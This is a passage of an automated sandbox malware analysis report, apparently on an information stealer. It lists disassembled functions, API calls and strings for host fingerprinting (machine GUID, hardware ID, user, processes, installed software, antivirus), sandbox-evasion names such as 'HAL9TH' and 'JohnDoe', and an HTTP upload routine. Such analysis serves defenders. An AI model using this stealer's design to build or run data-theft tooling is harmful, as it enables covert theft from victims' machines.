                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2238633743-0
                                                                                                                                                                                      • Opcode ID: c5327fa134be20409fab16c2b574b6bcc428547e37753220b2dafe3825c1b68b
                                                                                                                                                                                      • Instruction ID: 55ff34f7a2445af246ac935d4fd5f86b9473609eaf3f17190a6495ee306ba725
                                                                                                                                                                                      • Opcode Fuzzy Hash: c5327fa134be20409fab16c2b574b6bcc428547e37753220b2dafe3825c1b68b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8171ED75509601EFEB02DFE0EE1996E3FB6F74838134484A6E90A91A30D7B25992EF50
                                                                                                                                                                                      Function 00352885 Relevance: 48.1, APIs: 2, Strings: 25, Instructions: 836stringCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1304 352885-3532cc call 34e57d call 34e6d4 call 34e63b call 34e5e8 call 34202d call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e851 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34ef2d call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34efba call 34e682 call 34e63b call 34e5e8 * 2 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34f078 call 34e682 call 34e63b call 34e5e8 * 2 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 GetCurrentProcessId call 34fb18 call 34e682 call 34e63b call 34e5e8 * 2 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34f1be call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34f2ff call 34e682 call 34e63b call 34e5e8 * 2 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34f493 call 34e682 call 34e63b call 34e5e8 * 2 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e816 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e7e4 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34eebb call 34e682 call 34e63b call 34e5e8 * 2 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e8fe call 34e682 call 34e63b call 34e5e8 * 2 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e851 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e8ab call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e9e9 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34ea85 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34ea52 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34eb44 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34ebad call 34e682 call 34e63b call 34e5e8 * 2 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34ee16 call 34e682 call 34e63b call 34e5e8 * 2 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34ec0c call 34e682 call 34e63b call 34e5e8 * 2 call 34ec0c call 34e682 call 34e63b call 34e5e8 * 2 call 34e6d4 call 34e63b call 34e5e8 call 34e766 lstrlenA call 34e766 call 34e57d call 341324 call 3526f8 call 34e5e8 * 2 call 341301
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                        • Part of subcall function 0034E851: GetProcessHeap.KERNEL32(00000000,00000104,003613FC), ref: 0034E85F
                                                                                                                                                                                        • Part of subcall function 0034E851: HeapAlloc.KERNEL32(00000000), ref: 0034E866
                                                                                                                                                                                        • Part of subcall function 0034E851: GetLocalTime.KERNEL32(?), ref: 0034E872
                                                                                                                                                                                        • Part of subcall function 0034E851: wsprintfA.USER32 ref: 0034E89D
                                                                                                                                                                                        • Part of subcall function 0034EF2D: memset.MSVCRT ref: 0034EF53
                                                                                                                                                                                        • Part of subcall function 0034EF2D: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?), ref: 0034EF6F
                                                                                                                                                                                        • Part of subcall function 0034EF2D: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,?), ref: 0034EF8E
                                                                                                                                                                                        • Part of subcall function 0034EF2D: RegCloseKey.ADVAPI32(?), ref: 0034EF97
                                                                                                                                                                                        • Part of subcall function 0034EF2D: CharToOemA.USER32(?,?), ref: 0034EFAB
                                                                                                                                                                                        • Part of subcall function 0034EFBA: GetCurrentHwProfileA.ADVAPI32(?), ref: 0034EFCA
                                                                                                                                                                                        • Part of subcall function 0034EFBA: memset.MSVCRT ref: 0034EFF5
                                                                                                                                                                                        • Part of subcall function 0034EFBA: lstrcatA.KERNEL32(?,00000000), ref: 0034F025
                                                                                                                                                                                        • Part of subcall function 0034EFBA: lstrcatA.KERNEL32(?,003618AC), ref: 0034F03F
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
                                                                                                                                                                                        • Part of subcall function 0034F078: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00361ECC), ref: 0034F095
                                                                                                                                                                                        • Part of subcall function 0034F078: GetVolumeInformationA.KERNEL32(nK5,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0034F0C7
                                                                                                                                                                                        • Part of subcall function 0034F078: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0034F10A
                                                                                                                                                                                        • Part of subcall function 0034F078: HeapAlloc.KERNEL32(00000000), ref: 0034F111
                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,00361678,00000000,?,00000000,00000000,?,HWID: ,00000000,?,003613FC,00000000), ref: 00352AED
                                                                                                                                                                                        • Part of subcall function 0034FB18: OpenProcess.KERNEL32(00000410,00000000,?,003613FC), ref: 0034FB2C
                                                                                                                                                                                        • Part of subcall function 0034FB18: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0034FB47
                                                                                                                                                                                        • Part of subcall function 0034FB18: CloseHandle.KERNEL32(00000000), ref: 0034FB4E
                                                                                                                                                                                        • Part of subcall function 0034F1BE: GetProcessHeap.KERNEL32(00000000,00000104,00361678,?,?,?,00352BAA,00000000,?,Windows: ,00000000,?,00361678,00000000,?,Work Dir: In memory), ref: 0034F1D2
                                                                                                                                                                                        • Part of subcall function 0034F1BE: HeapAlloc.KERNEL32(00000000,?,?,?,00352BAA,00000000,?,Windows: ,00000000,?,00361678,00000000,?,Work Dir: In memory,00000000,?), ref: 0034F1D9
                                                                                                                                                                                        • Part of subcall function 0034F2FF: _EH_prolog.MSVCRT ref: 0034F304
                                                                                                                                                                                        • Part of subcall function 0034F2FF: CoInitializeEx.OLE32(00000000,00000000,00361678,003613FC,00361ECC), ref: 0034F319
                                                                                                                                                                                        • Part of subcall function 0034F2FF: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0034F32A
                                                                                                                                                                                        • Part of subcall function 0034F2FF: CoCreateInstance.OLE32(003629E0,00000000,00000001,00362910,?), ref: 0034F344
                                                                                                                                                                                        • Part of subcall function 0034F2FF: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0034F37A
                                                                                                                                                                                        • Part of subcall function 0034F2FF: VariantInit.OLEAUT32(?), ref: 0034F3D5
                                                                                                                                                                                        • Part of subcall function 0034F493: _EH_prolog.MSVCRT ref: 0034F498
                                                                                                                                                                                        • Part of subcall function 0034F493: CoInitializeEx.OLE32(00000000,00000000,00361678,003613FC,00361ECC), ref: 0034F4AD
                                                                                                                                                                                        • Part of subcall function 0034F493: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0034F4BE
                                                                                                                                                                                        • Part of subcall function 0034F493: CoCreateInstance.OLE32(003629E0,00000000,00000001,00362910,?), ref: 0034F4D8
                                                                                                                                                                                        • Part of subcall function 0034F493: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0034F50E
                                                                                                                                                                                        • Part of subcall function 0034F493: VariantInit.OLEAUT32(?), ref: 0034F55D
                                                                                                                                                                                        • Part of subcall function 0034E816: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0034104D,HAL9TH,003555D9), ref: 0034E822
                                                                                                                                                                                        • Part of subcall function 0034E816: HeapAlloc.KERNEL32(00000000,?,?,?,0034104D,HAL9TH,003555D9), ref: 0034E829
                                                                                                                                                                                        • Part of subcall function 0034E816: GetComputerNameA.KERNEL32(00000000,?), ref: 0034E83D
                                                                                                                                                                                        • Part of subcall function 0034E7E4: GetProcessHeap.KERNEL32(00000000,00000104,?,HAL9TH,?,00341063,JohnDoe,003555D9), ref: 0034E7F0
                                                                                                                                                                                        • Part of subcall function 0034E7E4: HeapAlloc.KERNEL32(00000000,?,HAL9TH,?,00341063,JohnDoe,003555D9), ref: 0034E7F7
                                                                                                                                                                                        • Part of subcall function 0034E7E4: GetUserNameA.ADVAPI32(00000000,?), ref: 0034E80B
                                                                                                                                                                                        • Part of subcall function 0034EEBB: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00352DB7,?,00000000,?,Display Resolution: ,00000000,?,003613FC,00000000,?,00000000,00000000), ref: 0034EEFA
                                                                                                                                                                                        • Part of subcall function 0034EEBB: HeapAlloc.KERNEL32(00000000,?,?,00352DB7,?,00000000,?,Display Resolution: ,00000000,?,003613FC,00000000,?,00000000,00000000,?), ref: 0034EF01
                                                                                                                                                                                        • Part of subcall function 0034EEBB: wsprintfA.USER32 ref: 0034EF13
                                                                                                                                                                                        • Part of subcall function 0034E8FE: GetKeyboardLayoutList.USER32(00000000,00000000,0035E266,00361678,003613FC,00361ECC), ref: 0034E91E
                                                                                                                                                                                        • Part of subcall function 0034E8FE: LocalAlloc.KERNEL32(00000040,00000000), ref: 0034E92C
                                                                                                                                                                                        • Part of subcall function 0034E8FE: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 0034E936
                                                                                                                                                                                        • Part of subcall function 0034E8FE: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0034E95B
                                                                                                                                                                                        • Part of subcall function 0034E8FE: LocalFree.KERNEL32(00000000), ref: 0034E9DB
                                                                                                                                                                                        • Part of subcall function 0034E8AB: GetProcessHeap.KERNEL32(00000000,00000104,003613FC), ref: 0034E8BC
                                                                                                                                                                                        • Part of subcall function 0034E8AB: HeapAlloc.KERNEL32(00000000), ref: 0034E8C3
                                                                                                                                                                                        • Part of subcall function 0034E8AB: GetTimeZoneInformation.KERNEL32(?), ref: 0034E8D2
                                                                                                                                                                                        • Part of subcall function 0034E8AB: wsprintfA.USER32 ref: 0034E8F0
                                                                                                                                                                                        • Part of subcall function 0034E9E9: GetProcessHeap.KERNEL32(00000000,00000104,00361678,?,?,?,00352F7B,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,00361678), ref: 0034E9FD
                                                                                                                                                                                        • Part of subcall function 0034E9E9: HeapAlloc.KERNEL32(00000000,?,?,?,00352F7B,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,00361678,00000000,?), ref: 0034EA04
                                                                                                                                                                                        • Part of subcall function 0034E9E9: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,?,?,?,?,00352F7B,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0034EA22
                                                                                                                                                                                        • Part of subcall function 0034E9E9: RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,00352F7B,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0034EA3E
                                                                                                                                                                                        • Part of subcall function 0034E9E9: RegCloseKey.ADVAPI32(?,?,?,?,00352F7B,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,00361678,00000000,?), ref: 0034EA47
                                                                                                                                                                                        • Part of subcall function 0034EA85: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 0034EAD8
                                                                                                                                                                                        • Part of subcall function 0034EA85: wsprintfA.USER32 ref: 0034EB1E
                                                                                                                                                                                        • Part of subcall function 0034EA52: GetSystemInfo.KERNEL32(?), ref: 0034EA5F
                                                                                                                                                                                        • Part of subcall function 0034EA52: wsprintfA.USER32 ref: 0034EA74
                                                                                                                                                                                        • Part of subcall function 0034EB44: GetProcessHeap.KERNEL32(00000000,00000104,00361678), ref: 0034EB52
                                                                                                                                                                                        • Part of subcall function 0034EB44: HeapAlloc.KERNEL32(00000000), ref: 0034EB59
                                                                                                                                                                                        • Part of subcall function 0034EB44: GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 0034EB79
                                                                                                                                                                                        • Part of subcall function 0034EB44: wsprintfA.USER32 ref: 0034EB9F
                                                                                                                                                                                        • Part of subcall function 0034EE16: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0035E266,00361678,003613FC), ref: 0034EE3E
                                                                                                                                                                                        • Part of subcall function 0034EE16: Process32First.KERNEL32(00000000,?), ref: 0034EE4E
                                                                                                                                                                                        • Part of subcall function 0034EE16: Process32Next.KERNEL32(00000000,?), ref: 0034EEA4
                                                                                                                                                                                        • Part of subcall function 0034EE16: CloseHandle.KERNEL32(00000000), ref: 0034EEAF
                                                                                                                                                                                        • Part of subcall function 0034EC0C: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0035E266,003613FC,00361ECC), ref: 0034EC4A
                                                                                                                                                                                        • Part of subcall function 0034EC0C: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000,00361678), ref: 0034EC8E
                                                                                                                                                                                        • Part of subcall function 0034EC0C: wsprintfA.USER32 ref: 0034ECB8
                                                                                                                                                                                        • Part of subcall function 0034EC0C: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0034ECD1
                                                                                                                                                                                        • Part of subcall function 0034EC0C: RegQueryValueExA.KERNEL32(?,00000000,?,?,?), ref: 0034ECFB
                                                                                                                                                                                        • Part of subcall function 0034EC0C: lstrlenA.KERNEL32(?), ref: 0034ED10
                                                                                                                                                                                        • Part of subcall function 0034EC0C: RegQueryValueExA.KERNEL32(?,00000000,?,?,?,00000000,?,?,00000000,?,003613FC), ref: 0034ED81
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,?,00361678,00000000,?,00000000,00000000,?,00000000,00000000,?,[Software],00000000,?,00361678), ref: 00353275
                                                                                                                                                                                        • Part of subcall function 003526F8: _MSFOpenExW.MSPDB140-MSVCRT ref: 003527A0
                                                                                                                                                                                        • Part of subcall function 003526F8: CreateThread.KERNEL32(00000000,00000000,0035165F,?,00000000,00000000), ref: 003527B5
                                                                                                                                                                                        • Part of subcall function 003526F8: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 003527BD
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Heap$Process$Alloc$wsprintf$Open$CloseCreateInitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCurrentH_prologHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariantmemset$CharComputerDirectoryEnumFileFirstFreeGlobalLocaleLogicalMemoryModuleNextObjectProcessorProfileSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
                                                                                                                                                                                      • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                                      • API String ID: 2383149703-1014693891
                                                                                                                                                                                      • Opcode ID: 7b5b6e283fec8a289cf2752d93332048277a54832f32980589634b14296a72f0
                                                                                                                                                                                      • Instruction ID: 502c4034f73c609f7939477b495ba3f83acf85759fb6ba8de6b3ef5f1fafeff3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b5b6e283fec8a289cf2752d93332048277a54832f32980589634b14296a72f0
                                                                                                                                                                                      • Instruction Fuzzy Hash: FB62FD72840008AADB07FB94D992CDEB3BCBE25344F5542A6F512BE091EF357F09CA65
                                                                                                                                                                                      Function 00345AE7 Relevance: 46.1, APIs: 20, Strings: 6, Instructions: 563networkstringmemoryCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 2182 345ae7-345b81 call 34e5b4 call 343ef3 call 34e57d * 5 call 34e766 InternetOpenA StrCmpCA 2199 345b86-345b89 2182->2199 2200 345b83 2182->2200 2201 34611c-346142 InternetCloseHandle call 34e766 call 346a41 2199->2201 2202 345b8f-345cc7 call 34f6b1 call 34e682 call 34e63b call 34e5e8 * 2 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e682 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e682 call 34e63b call 34e5e8 * 2 InternetConnectA 2199->2202 2200->2199 2211 346144-346165 call 34e5f1 call 34e6d4 call 34e63b call 34e5e8 2201->2211 2212 34616a-3461b6 call 34f5e9 * 2 call 34e5e8 * 4 call 341301 call 34e5e8 2201->2212 2202->2201 2282 345ccd-345cff HttpOpenRequestA 2202->2282 2211->2212 2283 345d05-345d09 2282->2283 2284 346113-346116 InternetCloseHandle 2282->2284 2285 345d21-3460bb call 34e6d4 call 34e63b call 34e5e8 call 34e682 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e682 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e682 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 342033 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e682 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e682 call 34e63b call 34e5e8 call 34e766 lstrlenA call 34e766 lstrlenA GetProcessHeap HeapAlloc call 34e766 lstrlenA call 34e766 memcpy call 34e766 lstrlenA call 34e766 * 2 lstrlenA memcpy call 34e766 lstrlenA call 34e766 HttpSendRequestA 2283->2285 2286 345d0b-345d1b InternetSetOptionA 2283->2286 2284->2201 2445 3460f0-346105 InternetReadFile 2285->2445 2286->2285 2446 346107-34610e InternetCloseHandle 2445->2446 2447 3460bd-3460c2 2445->2447 2446->2284 2447->2446 2448 3460c4-3460eb call 34e6d4 call 34e63b call 34e5e8 2447->2448 2448->2445
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
                                                                                                                                                                                        • Part of subcall function 00343EF3: ??_U@YAPAXI@Z.MSVCRT(00000400,00361C14,ERROR), ref: 00343F1F
                                                                                                                                                                                        • Part of subcall function 00343EF3: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,00361C14,ERROR), ref: 00343F28
                                                                                                                                                                                        • Part of subcall function 00343EF3: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,00000400,00361C14,ERROR), ref: 00343F31
                                                                                                                                                                                        • Part of subcall function 00343EF3: lstrlenA.KERNEL32(00000000,00000000,?,?,00361C14,ERROR), ref: 00343F4B
                                                                                                                                                                                        • Part of subcall function 00343EF3: InternetCrackUrlA.WININET(00000000,00000000,?,00361C14), ref: 00343F5B
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00345B61
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,?,?,?,?,?,?,00361ECC), ref: 00345B79
                                                                                                                                                                                      • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00345CBA
                                                                                                                                                                                      • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00345CF4
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00354BD1,?,00000000,00354BD1,",00000000,00354BD1,mode,00000000,00354BD1,00000000,00354BD1,00361348,00000000), ref: 00346011
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,00361ECC), ref: 00346022
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,00361ECC), ref: 0034602D
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,00361ECC), ref: 00346034
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,00361ECC), ref: 00346045
                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,?,?,?,?,?,?,00361ECC), ref: 00346056
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00361ECC), ref: 00346067
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00361ECC), ref: 00346080
                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,00361ECC), ref: 00346089
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00361ECC), ref: 0034609C
                                                                                                                                                                                      • HttpSendRequestA.WININET(?,00000000,00000000), ref: 003460B0
                                                                                                                                                                                      • InternetReadFile.WININET(?,?,000000C7,00000000), ref: 003460FD
                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00346108
                                                                                                                                                                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00345D1B
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
